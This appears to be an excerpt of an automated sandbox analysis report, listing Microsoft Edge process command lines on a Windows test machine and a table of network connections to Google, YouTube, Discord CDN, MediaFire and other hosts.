"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1131942136845274283,8504092740489053096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,13113444218560925127,7190203414713117747,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,772615986883967298,10356735890533463369,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,772615986883967298,10356735890533463369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3254011041425604286,3353583623344606669,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3254011041425604286,3353583623344606669,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7206838472252035411,1182414051228374865,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7206838472252035411,1182414051228374865,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,3094581865193263331,17048407883914289705,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,13113444218560925127,7190203414713117747,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,805125742054450437,10762031736811608025,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,805125742054450437,10762031736811608025,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,3094581865193263331,17048407883914289705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5708 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x508
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,7069511233774617223,2428054952094498860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6324 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | www.protegent360.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | rr3---sn-4g5lzned.googlevideo.com | udp |
| DE | 74.125.162.8:443 | rr3---sn-4g5lzned.googlevideo.com | tcp |
| DE | 74.125.162.8:443 | rr3---sn-4g5lzned.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 23.184.185.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.162.125.74.in-addr.arpa | udp |
| GB | 142.250.187.214:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download2389.mediafire.com | udp |
| US | 199.91.155.130:80 | download2389.mediafire.com | tcp |
| US | 199.91.155.130:80 | download2389.mediafire.com | tcp |
| US | 8.8.8.8:53 | 130.155.91.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:80 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 142.250.200.10:80 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| US | 104.16.114.74:80 | static.mediafire.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| GB | 52.85.142.7:443 | cdn.amplitude.com | tcp |
| US | 104.16.57.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.142.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-4g5edndl.googlevideo.com | udp |
| DE | 74.125.162.170:443 | rr5---sn-4g5edndl.googlevideo.com | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.162.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr2---sn-ntqe6n76.googlevideo.com | udp |
| AU | 173.194.28.7:443 | rr2---sn-ntqe6n76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 7.28.194.173.in-addr.arpa | udp |
| AU | 173.194.28.7:443 | rr2---sn-ntqe6n76.googlevideo.com | tcp |
| AU | 173.194.28.7:443 | rr2---sn-ntqe6n76.googlevideo.com | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.212.234:443 | jnn-pa.googleapis.com | tcp |
| GB | 216.58.212.234:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mediafire.zendesk.com | udp |
| US | 8.8.8.8:53 | fast.io | udp |
| US | 8.8.8.8:53 | blog.mediafire.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 44.236.203.160:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.203.236.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.16.238:80 | translate.google.com | tcp |
| GB | 172.217.16.238:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 66.102.1.154:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 142.250.187.202:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | 154.1.102.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| BE | 66.102.1.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
